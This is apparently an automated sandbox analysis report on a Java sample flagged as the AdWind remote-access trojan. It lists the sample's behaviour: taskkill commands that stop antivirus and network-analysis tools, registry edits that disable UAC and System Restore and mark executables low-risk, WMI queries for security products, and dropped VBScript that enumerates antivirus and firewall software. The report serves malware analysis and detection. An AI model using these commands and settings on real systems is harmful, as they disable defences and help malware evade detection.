Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive8340316412854535662.vbs	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4329570775648502228.vbs	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive8340316412854535662.vbs	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4329570775648502228.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6110391193418258336.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\XGkhOkmDsC474469576599115670.reg
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\regedit.exe "C:\Windows\system32\regedit.exe" /s C:\Users\user\AppData\Local\Temp\XGkhOkmDsC474469576599115670.reg

Uses taskkill to terminate processes

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpCmdRun.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mergecap.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F	Jump to behavior

Source: javaw.exe, 00000001.00000002.2947521616.0000000004250000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2947521616.00000000043B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: F{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}
Source: javaw.exe, 00000001.00000002.2947521616.0000000004705000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: t/{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}CS-Uninstall.exe"],"NAME":"MCShield Anti-Malware Tool"},{"PROCESS":["SDScan.exe","SDFSSvc.exe","SDWelcome.exe","SDTray.exe"],"NAME":"SPYBOT AntiMalware"},{"PROCESS":["UnThreat.exe","utsvc.exe"],"NAME":"UnThreat Antivirus"},{"PROCESS":["FortiClient.exe","fcappdb.exe","FCDBlog.exe","FCHelper64.exe","fmon.exe","FortiESNAC.exe","FortiProxy.exe","FortiSSLVPNdaemon.exe","FortiTray.exe","FortiFW.exe","FortiClient_Diagnostic_Tool.exe","av_task.exe"],"NAME":"FortiClient"},{"PROCESS":["CertReg.exe","FilMsg.exe","FilUp.exe","filwscc.exe","filwscc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Users\\user\\AppData\\Roaming\\cmukyspiy.txt","VBOX":false,"RAM":"8.0 GB"}"],"NAME":"VIPRE Security 2015"},{"PROCESS":["bavhm.exe","BavSvc.exe","BavTray.exe","Bav.exe","BavWebClient.exe","BavUpdater.exe"],"NAME":"Baidu Antivirus 2015"},{"PROCESS":["MCSh#"
Source: javaw.exe, 00000001.00000002.2947521616.0000000004705000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}CS-Uninstall.exe"],"NAME":"MCShield Anti-Malware Tool"},{"PROCESS":["SDScan.exe","SDFSSvc.exe","SDWelcome.exe","SDTray.exe"],"NAME":"SPYBOT AntiMalware"},{"PROCESS":["UnThreat.exe","utsvc.exe"],"NAME":"UnThreat Antivirus"},{"PROCESS":["FortiClient.exe","fcappdb.exe","FCDBlog.exe","FCHelper64.exe","fmon.exe","FortiESNAC.exe","FortiProxy.exe","FortiSSLVPNdaemon.exe","FortiTray.exe","FortiFW.exe","FortiClient_Diagnostic_Tool.exe","av_task.exe"],"NAME":"FortiClient"},{"PROCESS":["CertReg.exe","FilMsg.exe","FilUp.exe","filwscc.exe","filwscc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Users\\user\\AppData\\Roaming\\cmukyspiy.txt","VBOX":false,"RAM":"8.0 GB"}"],"NAME":"VIPRE Security 2015"},{"PROCESS":["bavhm.exe","BavSvc.exe","BavTray.exe","Bav.exe","BavWebClient.exe","BavUpdater.exe"],"NAME":"Baidu Antivirus 2015"},{"PROCESS":["MCSh
Source: javaw.exe, 00000001.00000002.2947521616.0000000004705000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ACTIVE_WINDOW":"Program Manager","COMMAND":5}VBOX":false,"RAM":"8.0 GB"}cc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\UK$
Source: javaw.exe, 00000001.00000002.2947521616.0000000004413000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.0000000009BAA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2947521616.0000000004250000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: javaw.exe, 00000001.00000002.2956709894.0000000009BF4000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2947521616.0000000004250000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2947521616.00000000043B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}
Source: javaw.exe, 00000001.00000002.2947521616.0000000004729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}3
Source: javaw.exe, 00000001.00000002.2947521616.0000000004705000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerS
Source: javaw.exe, 00000001.00000002.2947521616.0000000004250000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2947521616.00000000043B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: "{"ACTIVE_WINDOW":"Program Manager"
Source: javaw.exe, 00000001.00000002.2956709894.0000000009BD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager8

Contains functionality to query CPU information (cpuid)

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Code function: 1_2_020303C0 cpuid

1_2_020303C0

Queries the installed Java version

Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7124 VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\3512 VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jfr.jar VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation	Jump to behavior

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Code function: 1_2_6EEF3DFC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

1_2_6EEF3DFC

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable UAC(promptonsecuredesktop)

Source: C:\Windows\SysWOW64\regedit.exe

Registry value created: PromptOnSecureDesktop 0

Disables UAC (registry)

Source: C:\Windows\SysWOW64\regedit.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Disables Windows system restore

Source: C:\Windows\SysWOW64\regedit.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore DisableSR

Disables zone checking for all users

Source: C:\Windows\SysWOW64\regedit.exe

Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS

AV process strings found (often used to terminate AV products)

Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: EMLPROXY.EXE
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AVKService.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: fsgk32.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AVKProxy.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AVKTray.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBAMTray.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: K7RTScan.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: FSMA32.EXE
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ONLINENT.EXE
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SCANWSCS.EXE
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SUPERAntiSpyware.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: K7FWSrvc.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: guardxservice.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: K7TSecurity.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: K7PSSrvc.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: MSASCui.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: acs.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: K7TSMngr.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: BullGuard.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: wireshark.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: virusutilities.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: K7EmlPxy.EXE
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ClamTray.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBAMSvc.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: cscript.exe, 00000008.00000003.1767712530.0000000003233000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000008.00000003.1767176316.0000000003247000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000008.00000003.1767364953.0000000003217000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000008.00000002.1769555463.000000000324B000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000008.00000002.1769445590.0000000003234000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000008.00000003.1767543395.0000000003249000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000003.1767515363.0000000003297000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000003.1767926565.000000000329A000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000002.1769414316.00000000032C6000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000002.1769335671.000000000329B000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000003.1767741703.00000000032C3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: FPAVServer.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: mbam.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: QUHLPSVC.EXE
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: FProtTray.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ClamWin.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: op_mon.exe

Add executable type to lowriskfiletypes to avoid warning prompt

Source: C:\Windows\SysWOW64\regedit.exe

Registry value created: LowRiskFileTypes .avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\SysWOW64\cscript.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
Source: C:\Windows\SysWOW64\cscript.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
Source: C:\Windows\SysWOW64\cscript.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from FirewallProduct
Source: C:\Windows\SysWOW64\cscript.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from FirewallProduct

Stealing of Sensitive Information

Yara detected AdWind RAT

Source: Yara match

File source: Process Memory Space: java.exe PID: 3512, type: MEMORYSTR

Yara detected AdWind RATs dll

Source: Yara match	File source: 1.2.javaw.exe.6eef0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.java.exe.9e47cc4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Windows197633722729995093.dll, type: DROPPED

Remote Access Functionality

Detected ADWIND Rat

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNext	Jump to dropped file
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNext	Jump to dropped file
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNext	Jump to dropped file
